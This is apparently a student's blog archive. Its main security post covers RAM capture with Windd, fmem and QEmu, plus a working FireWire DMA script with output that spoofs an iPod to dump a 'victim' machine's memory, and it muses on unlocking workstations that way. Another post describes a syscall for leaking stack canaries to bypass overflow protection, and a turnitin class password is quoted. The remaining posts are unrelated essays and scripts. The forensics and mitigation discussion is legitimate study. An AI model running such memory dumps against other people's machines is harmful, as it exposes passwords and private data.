Imaging RAM using Windd, /dev/fmem or QEmu

While using FireWire to obtain RAM is pretty convenient and powerful, one might still consider using a different method to capture RAM. A reason might be the absence of a FireWire port or driver, or simply the fact that the necessary cable or software is missing. Another more interesting scenario is the analysis of a systems behaviour, i.e. how does the memory differ between a locked and an unlocked workstation.

Windd

Using FireWire is not the only method to get the RAM. If you want to image Windows’ RAM, you could consider running program, i.e. Windd, on the victims machine which simply dumps all memory to the disk. You might have some problems running it though:

Error: InstallDriver cannot start service (Err=0x00000002)
Error: Cannot open \\.\win32dd

This not very helpful error message wants you to move the .sys file to %WINDIR%\SYSTEM32 and search and delete windd references in the Registry.

When you try to use Windd using a normal, non administrator account, you’ll find that elevated privileges are needed to run the executable:

    -> Error: win32dd requires Administrator privileges

If faced with a PC which is logged in with a non administrative account, which is typically found in a business environment, the Windows runas command needs to be used to run Win32dd with the rights of either a local or domain administrator account:

runas /user:Administrator "Win32dd.exe /f c:\images\memorydump"

When using runas you’ll notice that a full path is needed to be specified for creating the image file. Without specifiying a path, Windd saves the RAM image file in to the %WINDIR%\system32 directory instead of the current directory as you would have expected.

The fmem Kernel Module

Although Linux provides a /dev/mem file, one cannot read the physical RAM through it. In order for Linux to expose the RAM via a file, one can load the fmem Kernel module and use dd to obtain the contents of the physical memory address space, e.g. to obtain one gigabyte of memory dd if=/dev/fmem of=memdump bs=1048576 count=1024.
I tried using cat to dump the RAM but found that it read past the end of the physical memory. This is a known bug with fmem which the author notes in the README file provided with the module.

In order to be able to load the module, it needs to be downloaded and compiled, doing a normal untar, make, and run the supplied run.sh script to install, first. These steps are pretty straight forward.

Using QEmu to save RAM

QEmu is a virtualisation solution that allows to dump the RAM of the guest into a file unsing the pmemsave command. I think this deserves attention because it can be used to prepare attacks using the FireWire technique. That technique allows patching the memory on a running (Windows) system which in turn can be used to, say, unlock a password protected workstation. While unlocking has been done for a Windows XP SP2 system, no publicly available tools do that for a later Windows system.

With QEmu, we are able to run a target system, say Windows XP SP3, and get two memory dumps: The first while the machine is locked, and the second right after unlocking. By looking at the difference, we might be able to tell which data has to be modified in what way in order to remotely unlock the machine. This technique can also be used to, say, disable a Firewall, elevate privileges or even inject new processes into the running system. It is noteworthy that this method is Operating System independent for both, the host and the guest, because QEmu is free software which run on many platforms and can itself run many Operating Systems.

Reading RAM using FireWire

Recently, I had to obtain the Random Access Memory (RAM) of a Windows XP SP3 system. The RAM is a storage for (program) data but unlike a harddisk it is around a million times faster and volatile. That is, its contents vanishes within a few seconds after the machine is powered off. But as there is data of the running kernel and almost every running program in the RAM, it contains valuable information about the state of a machine, including passwords, running processes, open connections or registry data.

However, manually obtaining the RAM contents usually involves altering the state of the machine, because the system has to either run a special program (and running programs modifies the state) or to load a special FireWire driver (and loading drivers off the disk into memory alters the machines state). Even hibernating the system modifies the machine because files are written, memory might get compressed, etc. It is possible to obtain the contents of the RAM by cooling the chips down and quickly putting them into a system which keeps refreshing the data so that it can be read with an own system. This method, however, requires a lot of preparation, skill and fortune because every second matters. But even if you manage to save the RAM, you might get into trouble because the examined system will still have a CPU cache which might keep the system up and running, potentially noticing the loss of RAM and changing contents of the disk (i.e. erasing). Since a Windows (Vista) Kernel is around 9.9MiB in size it would not necessarily fit into a 2MiB cache which modern CPUs have, but a Linux (2.6.29) Kernel can be 1.7MiB in size which would fit perfectly. Other, smaller, Kernels such as L4 or QNX exist.

I, however, went with the FireWire method just because I thought it’s fun to snarf other machines memory using just a cable 🙂

FireWire was invented in 1995 by Apple for high-speed data transmission. By design, it is able to read and write directly to the host machines memory contents. This feature can be exploited to dump the machines memory.

However, to dump Windows’ memory via FireWire, one needs to convince Windows to be eligible to do so by pretending to be, i.e. a proprietary and expensive audio player called “iPod”.

By using existing tools it is relatively easy to dump Windows’ memory.
One needs to download and build pythonraw1394 and the necessary dependencies.
Then, the proper tools, which basically configure the Linux host to be an iPod and dump the victims machine’s memory must be run.
Following script should do all the necessary steps and finally save a 2GB memory dump in a temporary directory.
It is known to work on an Ubuntu 9.10 Linux system.

#!/bin/bash
 
DIR=/tmp/$RANDOM
PYTHONRAW=http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
LOCALPORT=0
REMOTEPORT=1
NODE=0
 
mkdir -p $DIR && cd $DIR &&
  wget --continue -O- $PYTHONRAW | tar xvf - &&
  cd pythonraw1394/ &&
  sudo apt-get install -y libraw1394 libraw1394-dev swig python-dev build-essential &&
  sed -i 's/python2\.3/python2\.6/g' Makefile &&
  make &&
  sudo modprobe raw1394 &&
  sudo chgrp $USER /dev/raw1934 &&
  ./businfo &&
  ./romtool -g $LOCALPORT $DIR/localport.csr &&
  ./romtool -s $LOCALPORT ipod.csr &&
  ./1394memimage $REMOTEPORT $NODE $DIR/memdump 0 2G &&
  echo Success, please read the memory at $DIR/memdump || echo Failure

(I’ve just finished packaging that up for Ubuntu)

As for mitigation, the best would be to have no FireWire ports 😉 But it’d be stupid thing to rip off your FireWire ports or putting lots of glue into it, because FireWire is a nice technology that you want to use for your external harddrives, cameras, networking, etc. So simply deactivate the driver if you don’t need it! A plugged in device can thus not make use of the functionality. For Linux, rmmod ohci1394 should be sufficient. To make this permanent, you might want to add “blacklist ohci1394” to your /etc/modprobe.d/blacklist. If you then want to use some FireWire device, simply modprobe ohci1394.

By using the above mentioned script, we successfully obtained the contents of a Windows XP SP3 machine in a temporary directory.
In our case, it took around 500 seconds to capture 1024 MiB RAM. Interestingly enough, when reading more RAM than installed in the victims machine, the program puts 0xffs in the dump file. We rebooted the machine from Windows into Linux and read the RAM. Hence, reading RAM from a machine running Linux (2.6.31) works fine. We found it interesting that we still were able to read memory of the Windows system which we have shutdown properly. So Windows left artefacts which we were able read.

Note that the machine whose RAM we read ran a Linux Kernel which did not make use of the most recent FireWire stack, simply because it has not been officially released yet. It will be interesting to see, how and under which circumstances the new FireWire stack, called Juju, allows the RAM to be read and written.

For completeness, we also tried reading the RAM of a Laptop running MacOS and it worked equally well.

muelli@xbox:/tmp/pythonraw1394$ ionice -c 3 ./1394memimage 0 1 /tmp/windows.mem 0-1G
1394memimage v1.0 Adam Boileau, 2006.
Init firewire, port 0 node 1
Reading 0x3fd00000 (1045504KiB) at 2027 KiB/s...
1073741824 bytes read
Elapsed time 517.51 seconds
Writing metadata and hashes...
muelli@xbox:/tmp/pythonraw1394$ volatility ident -f windows.mem
              Image Name: windows.mem
              Image Type: Service Pack 3
                 VM Type: nopae
                     DTB: 0x39000
                Datetime: Mon Mar 22 19:06:42 2010
muelli@xbox:/tmp/pythonraw1394$

It might be interesting for future research to remotely change Windows’ memory to, say, unlock a password protected workstation, change configuration of a firewall or even inject new processes. Although we consider it to be very interesting to build a tiny appliance that does the memory dump of the victims machine, we could not find anything on the Internet. Given that products on the forensic market are pretty expensive, building such a machine might be very rewarding.

MSN Shutdown in 2003

During CA640 I was made to write an ethical review which I was supposed to hand in using a dodgy webservice. Since it got 90% people mugged me to make it available 😉 Of course, I don’t have a problem with that, so people now have a reference or know what to expect when they enter the course.

You can find the PDF here and its abstract reads:

At the end 2003 Microsoft closed the public chat-rooms of its Internet service called MSN.
MSN was pushed by Children’s Charities because they feared an abuse of these chat-rooms.
In some countries, however, the service was still available but subject to a charge.
This review raises ethical questions about Microsoft’s and the Children’s Charities’ behaviour because making the people pay with the excuse of protecting children is considered ethically questionable.
Also the Children’s Charities pushed for closure of a heavily used service although there is absolutely no evidence that children would be safer after closing down a chat-room.

If you are not interested in the non-technical details you might be interested to know that I use a Mercurial Hook on the server side to automatically compile the LaTeX sources one I push changes to the server:

$ cat .hg/hgrc
[hooks]
changegroup.compile = export FILE=paper && hg up -C && pdflatex --interaction=batchmode $FILE && bibtex $FILE && pdflatex --interaction=batchmode $FILE && pdflatex --interaction=batchmode $FILE

And then I just symlink that resulting PDF file to my public_html directory.

Digital Divide

Als Student kommt es hin und wieder vor, dass ich eine Hausarbeit schreiben muss. Da ich fest davon ueberzeugt, dass Uni, Wissenschaft und Wissen so frei wie moeglich sein sollten, und jedermensch auch noch durch Zahlung von Steuern potentiell das Studieren finanziert, denke ich, hat jedermensch das Recht mindestens zu sehen was ich so eigentlich den lieben langen Tag so mache.

Internet sei dank ist es heutzutage eher einfach, Dinge zu publizieren und Wissen fortzutragen. Deswegen gibt es hier nun eine Hausarbeit, die ich im letzten Semester in Gender Studies geschrieben habe.

Alien Toilet Sign
Alien Toilet Sign

Das Paper traegt den Namen “Weiblicher Zugang zu Technik und feministische Politiken” und das Abstract liesst sich wiefolgt:

Die Gründe, die zum Digital Divide, der digitalen Kluft, führen, sind vielfältig und Geschlecht ist einer davon.
Auch weibliche Gruppierungen haben das Ziel, den Anteil weiblicher Teilnehmer im Digitalen zu erhöhen.
Die Arbeit analysiert, wie dieses Ziel erreicht werden soll, warum das nicht gelingt und wie es eventuell doch erreicht werden kann.

Das PDF gibt es hier und ist als “Namensnennung-Keine kommerzielle Nutzung-Weitergabe unter gleichen Bedingungen 3.0 Deutschland” fuer jedermensch lizensiert. Das heisst aber nicht, dass ich es auf Anfrage anders lizensieren kann.

Die Arbeit liesst sich an einigen Stellen etwas ruckelig, was der Entstehungsgeschichte geschuldet ist. Im Prinzip sind aus 2.5 Arbeiten eine geworden. Ich hoffe, es ist dennoch nicht so schlimm.

Sollte das PDF inhaltlich nicht so spannend sein, lohnt es sich doch auf die technischen Details zu achten. So weiss das PDF, wie dessen Inhalt lizensiert ist. Dazu benutzt es XMP streams, die in das PDF eingebetted wurden. Die sind mit dem Paket hyperxmp ueber LaTeX in das PDF gekommen. Offiziell wird noch xmpincl empfohlen, aber das ist wirklich fies zu benutzen, weil mensch den XMP stream selbst erstellen muss.

\usepackage{hyperxmp}         % To be have an XMP Data Stream f.e. to include the license
[...]
\hypersetup{
        pdftitle={Weiblicher Zugang zu Technik und feministische Politiken},
        pdfauthor={Tobias Mueller},
        [...]
        pdfcopyright={This work is licensed to the public under the Creative Commons Attribution-Non-Commercial-Share Alike 3.0 Germany License.},
        pdflicenseurl={http://creativecommons.org/licenses/by-nc-sa/3.0/de/}
}

Mein Evince 2.29.1 (mit JHBuild gebaut) zeigt die Lizenzinformation froehlich an, Okular 0.9.2 nicht. Wie es sonst moeglich ist, in PDF eingebettete XMP Daten anzusehen, weiss ich nicht. Es waere fuer eine automatisierte Verarbeitung sicherlich interessant.

Vielen Dank and Chillum und Sourci, die mir beratend und patchend zur Seite standen und denen der Text wahrscheinlich zu den Ohren wieder herauskommt 😉

Fuer eine inhaltliche Diskussion ist die Kommentarfunktion wohl eher schlecht geeignet aber in Ermangelung an Alternativen steht sie dazu zur Verfuegung. Ich mag die Loesung, die das Djangobook benutzt. Am Rand von jedem Absatz gibt es eine Kommentarfunktion die sehr gut funktioniert.

Adding Linux Syscall

In a course (CA644) we were asked to add a new syscall to the Linux kernel.Linux Oxi Power!

As I believe that knowledge should be as free and as accessible as possible, I thought I have to at least publish our results. Another (though minor) reason is that the society -to some extend- pays for me doing science so I believe that the society deserves to at least see the results.

The need to actually publish that is not very big since a lot of information on how to do that exists already. However, that is mostly outdated. A good article is from macboy but it misses to mention a minor fact: The syscall() function is variadic so that it takes as many arguments as you give it.

So the abstract of the paper, that I’ve written together with Nosmo, reads:

This paper shows how to build a recent Linux kernel from scratch, how to add a new system call to it and how to implement new functionality easily.
The chosen functionality is to retrieve the stack protecting canary so that mitigation of buffer overflow attacks can be circumvented.

And you can download the PDF here.

If it’s not interesting for you content wise, it might be interesting from a technical point of view: The PDF has files attached, so that you don’t need to do the boring stuff yourself but rather save working files and modify them. That is achieved using the embedfile package.

\usepackage{embedfile}        % Provides \embedfile[filename=foo, desc={bar}]{file}
[...]
\embedfile[filespec=writetest.c, mimetype=text/x-c,desc={Program which uses the new systemcall}]{../code/userland/writetest.c}%

If your PDF client doesn’t allow you save the files (Evince does 🙂 ), you might want to use pdftk $PDF unpack_files in some empty directory.

Why I cannot use turnitin.com

turnitin logoWe are were supposed to use a proprietary webservice to hand in a paper:

You should also upload the essay to turnitin.com using the password key:

5vu0h5fw and id: 2998602

Late entries will suffer a penalty.

I cannot use this service. The simplest reason being that I cannot agree to their ToS.

Let me clarify just by picking some of their points off their ToS:

By clicking the “I agree — create profile” button below You: (1) represent that You have read and understand

As I am not a native speaker of neither English nor law-speak, I cannot  agree that I fully understand those ToS.

With the exception of the limited license granted below, nothing contained herein shall be construed as granting You any right, […]

Whatever that means, it sounds scary to me.

You further represent that You are not barred from receiving the Services or using the Site under the laws of the United States or other applicable jurisdiction.

I am sorry but I do not know whether this holds for me.

You may not modify, copy, distribute, transmit, display, perform, reproduce, publish, license, create derivative works from, transfer, or sell any information, Licensed Programs or Services from the Site without the prior written consent of iParadigms,

Lucky me, that I did not agree to their ToS yet so that I can copy them and bring them up here…

You further agree not to cause or permit the disassembly, decompilation, recompilation, or reverse engineering of any Licensed Program or technology underlying the Site. In jurisdictions where a right to reverse engineer is provided by law unless information is available about products in order to achieve interoperability, functional compatibility, or similar objectives, You agree to submit a detailed written proposal to iParadigms concerning any information You need for such purposes before engaging in reverse engineering.

I seriously do not want to write a proposal to this company for every new website I will build just because they use a <form> or some AJAX.

You are entirely responsible for maintaining the confidentiality of Your password

I cannot do that because I do not even know how they store my password (we are talking about an ASP program after all…).

You agree to use reasonable efforts to retain the confidentiality of class identification numbers and passwords. In no circumstance shall You transmit or make Your password or class identification number or any other passwords for the Site or class identification numbers available in any public forum, including, but not limited to any web page, blog, advertisement or other posting on the Internet, any public bulletin board, and any file that is accessible in a peer-to-peer network.

Yeah, sure. Nobody will find it on the page itself anyway.

This User Agreement is governed by the laws of the State of California, U.S.A. You hereby consent to the exclusive jurisdiction and venue of state and federal courts in Alameda County, California, U.S.A., in all disputes arising out of or relating to the use of the Site or the Services.

Might sound weird, but I do not want to be arraigned in the USA.

You agree not to use the Site in any jurisdiction that does not give effect to all provisions of these terms and conditions, including without limitation this paragraph.

Of course, I do not know enough about this jurisdiction to agree to those ToS.

Needless to say, that I do not want my data to fall under the American 9-11 Patriot Act.

Besides the above mentioned legal issues, I also have ethical concerns to contribute to the profit of a dodgy company by providing them my written essay so that they can use that to check other works against mine. If I believed in copyright, I could probably claim infringement as well.

Other topics, such as the violation of the presumption of innocence, are covered by resources on the web. And there is plenty of it. The most interesting ones include this and this.

Admittedly, I could care not as much as I do, but being an academic also means to think critically.

I more or less sent this email to the lecturer and it turned out that it’s not compulsory to use this dodgy service! *yay*

The future, however, is not safe yet, so more action is needed…

Wikify Pages

In one of our modules, “System Software”, we were asked to write a bash script which wikifies a page. That means to identify all nouns and replace them with a link to the Wikipedia.

I managed to write that up in two hours or so and I think I have a not so ugly solution (*cough* it’s still bash… *cough*). It has (major) drawbacks though. Valid X(HT)ML, i.e.

<![CDATA[ <body>

before the actual body will be recognized as the beginning. But parsing XML with plain bash is not that easy.

Also, my script somehow does not parse the payload correctly, that is it tails all the way down to the end of the file instead of stopping when </body> is reached.

Anyway, here’s the script:

#!/bin/bash
### A script which tries to Wikipediafy a given HTML page
### That means that every proper noun is linked against the Wikipedia
### but only if it's not already linked against something.
### Assumptions are, that the HTML file has a "<body>" Tag on a seperate
### line and that "<a>" Tags don't span multiple lines.
### Also, Capitalised words in XML Tags are treated as payload words, just
### because parsing XML properly is a matter of 100k Shellscript (consider
### parsing <[DATA[!). Also, this assumption is not too far off, because
### Captd words in XML happen seldomly anyway.
### As this is written in Bash, it is horribly slow. You'd rather want to do
### this in a language that actually understand {X,HT}ML like Python
 
# You might want to change this
BASEURL="http://en.wikipedia.org/wiki/"
 
set -e
 
### Better not change anything below, it might kill kittens
# To break only on newlines, set the IFS to that
OLD_IFS=$IFS
IFS='
'
HTML=$(cat $1) # Read the file for performance reasons
# Find the beginning and end of Document and try to be permissive with HTML
# Errors by only stopping after hitting one <body> Tag
START_BODY=$(grep --max-count=1 -ni '<body>'<<<"$HTML" | cut -d: -f1)
END_BODY=$(grep --max-count=1 -ni '</body>'<<<"$HTML" | cut -d: -f1)
 
HEAD=$(head -n $START_BODY<<<"$HTML") # Extract the Head for later use
# $(()) is most probably a non-portable bashism, so one wants to get rid of that
RANGE_BODY=$(($END_BODY-$START_BODY))
 
# And the extract the body
PAYLOAD=$(tail -n +${START_BODY} <<<"$HTML" | tail -n ${RANGE_BODY})
 
### This is the main part
### Basically search for all words beginning with a capital letter
### and match that. We can use that later with \1.
 
### Try to find already linked words, replace them by their MD5 hash,
### Run generic Word finding mechanism and replace back later
 
# We simply assume that a link doesn't span multiple lines
LINKMATCHES=$(grep -i -E --only-matching '<a .*>.*</a>' $1 || true)
 
LINKMATCH_ARRAY=()
MD5_ARRAY=()
CLEANEDPAYLOAD=$PAYLOAD
if [[ -n $LINKMATCHES ]]; then
    # We have found already linked words, put them into an array
    LINKMATCH_ARRAY=( $LINKMATCHES )
    index=0 # iterate over array
    for MATCH in $LINKMATCHES; do
        # Uniquely hash the found link and replace it, saving it's origin
        MATCHMD5=$(md5sum <<<$MATCH | awk '{print $1}')
        MD5_ARRAY[$index]=$MATCHMD5
        # We simply assume that there's no "," in the match
        # Use Bash internals string replacement facilities
        CLEANEDPAYLOAD=${CLEANEDPAYLOAD//${MATCH}/${MATCHMD5}}
        let "index = $index + 1"
    done
fi
 
 
# Find the matches
WORDMATCHES=$(grep --only-matching '[A-Z][a-z][a-z]*'<<<$CLEANEDPAYLOAD | sort | uniq)
WORDMATCHES_ARRAY=( $WORDMATCHES )
index=0
WIKIFIED=$CLEANEDPAYLOAD
while [[ "$index" -lt ${#WORDMATCHES_ARRAY[@]} ]]; do
    # Yeah, iterating over an array with 300+ entries is fun *sigh*
    # You could now ask Wikipedia and only continue if the page exist
    # if wget -q "${BASEURL}${SEARCH}"; then ...; else ...; fi
    SEARCH="${WORDMATCHES_ARRAY[$index]}"
    REPLACE="<a href=\"${BASEURL}${SEARCH}\">\2</a>"
    # Note, that we replace the first occurence only
    #WIKIFIED=${WIKIFIED/$SEARCH/$REPLACE} ## That's horribly slow, so use sed
    # Watch out for a problem: "<p>King" shall match as well as "King</p>"
    # or "King." but not eBook.
    # We thus match the needle plus the previous/following char,
    # iff it's not [A-Za-z]
    WIKIFIED=$(sed -e "s,\([^A-Za-z]\)\($SEARCH\)\([^A-Za-z]\),\1$REPLACE\3,"<<<$WIKIFIED) # so use sed
    let "index += 1"
done
 
# Replace hashed links with their original, same as above, only reverse.
# One could apply this technique to other tags besides <a>, but you really
# want to write that in a proper language :P
index=0
NOLINKWIKIPEDIAFIED=$WIKIFIED
while [[ "$index" -lt ${#MD5_ARRAY[@]} ]]; do
    SEARCH=${MD5_ARRAY[$index]}
    REPLACE=${LINKMATCH_ARRAY[$index]}
    NOLINKWIKIPEDIAFIED=${NOLINKWIKIPEDIAFIED//$SEARCH/$REPLACE}
    let "index += 1"
done
 
### Since we have the head and the payload separate, echo both
echo $HEAD
echo $NOLINKWIKIPEDIAFIED
 
# Reset the IFS, e.g. for following scripts
IFS=$OLD_IFS

Taking the IELTS

As I said some time ago, I had to do an IELTS test in order to apply at the DCU. I do already have kind of a language test which I made for the DAAD, but it’s not good enough for the DCU… So I bit the bullet and paid the Euros to take the IELTS.

I decided to go for IELTS, instead for the TOEFL, because I was told that it’s friendlier and even more comfortable to do. The TOEFL seems to be a computer based test which can be very annoying.

The IELTS was held in a friendly but formal atmosphere. Everything, and I mean everything, had a rule you and the supervisors had to stick to. I wasn’t even allowed to take my keys inside the examination room.  Not to mention my wallet.

The test itself went pretty well, especially the listening and reading part. I didn’t manage to perform equally well on the writing part. These tests took a couple of hours and I was pretty happy to get some fresh air afterwards. I had three hours sparetime before the speaking test should begin. Actually, I was really nervous. I don’t know why, because there was nothing I should be afraid of. I mean, even if I failed pretty hard, I always could redo the test. At least, I managed to speak and the results are not that bad.

So I a better result than I actually needed 🙂 One step closer to my application at the DCU.

LaTeX Transcript of Records

As I want to go to Dublin this year and I have to apply at the DCU. I have to list everything I did so far in my university and I asked our secretary whether we have english transcripts, because having them officially  translated is really expensive. She sent me a Word document which I was supposed to fill out. Of course, I was not satisfied at all, because the document looked terrible.

So I decided to write an equivalent in LaTeX (compiled PDF). I learned a lot about multipage tables and multirow cells 😉  Because I want to share my knowledge and don’t want you to spend two days on that as I did, you may feel free to use it for whatever you like 🙂

page-001

page-002

page-003

Update: New link to Transcript (with embedded TeX Source).

Bericht zur KIF

Ein kurzer Nachtrag zur Pressemitteilung, die ich ungern so im Raum stehen lassen moechte. Zum einen gibt es genug Kritik am Grundgesetz selber und zum anderen sind ein paar Worte zur Dortmunder KIF nötig.

KIF37.0 Logo

Ein zusammenfassender Bericht zur KIF befindet sich im FSR Blog. Ich habe nicht das Gefuehl, dass dem noch mehr hinzuzufuegen ist. Der ist zwar nicht so schoen zu lesen, wie der vom letzten Mal, aber fuer Erst-KIFfels gut geeignet um einen Eindruck zu bekommen.

Zum organisiatorischen vor Ort: Die Dortmunder Orga war ziemlich unentspannt. Ueberhaupt scheint es in Dortmund einen Regel-Fanatismus zu geben: Beim Betreten eines Busses muss mensch zu jeder Zeit sein Ticket vorzeigen, der Busfahrer haelt auch mitten in der Nacht nicht ausnahmsweise mal an einer Zwischenhaltestelle an und im Schwimmbad muss mensch nicht nur beim Betreten, sondern auch beim Verlassen seine Zugangsberechtigungskarte vorzeigen. Das hat uns in unserer Demo-Vorbereitungs-Phase ziemlich behindert: Weil wir die Rechner nicht mal eben auf dem Tisch verschieben konnten, die Tackernadeln wohl ein extrem wertvolles Gut waren und es insgesamt irgendwie schlechtes Karma gab, haben wir viel von unserer Vorbereitungs-Zeit mit dem Finden von Alternativplaenen verbrannt. Besonders geaergert hat mich, dass die Orgas eine schriftliche (sic!) Bestaetigung der (muendlich angemeldeten) Demo haben wollten. Nur um sicherzugehen, dass das alles rechtens sei. Weil ich mit den Polizisten vor Ort, also in der Innenstadt, verabredet war, bot ich an, dass ja ein Orga mitkommen koenne, weil so ein Gespraech von Polzist zu Anmelder beweist ja wohl ziemlich gut, dass alles mit rechten Dingen zugeht. Aber darauf wollte man sich aus unbekannten Gruenden nicht einlassen.

Demo in der Stadt

Ob die Grundrechtsdemo ueberhaupt so schlau war, ist eine interessante Frage. Zwar wird unser Grundgesetz viel gelobt und gepriesen, aber es gibt durchauch kritische Stimmen, die unser Grundgesetz aus verschiedenen Gruenden schlecht finden. Zur Geschichte unseres GGs gibt es bei Telepolis einen informativen Artikel. Zur spannenden Kritik schreibt das Magazin auch und ich finde, es gibt wirklich einige interessante Punkte. Ich koennte diese jetzt aufzaehlen und windige Akademiker machen das wohl auch so, aber ich glaube, dass die original Zitate die beste Quelle des Wissens sind 😛

Trotz der Kritik finde ich, dass die Bewusstseinsschaffung gut und wichtig war. Unser Grundgesetz mag zwar nicht das Beste sein, aber ohne verbriefte Grundrechte moechte ich lieber nicht leben.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.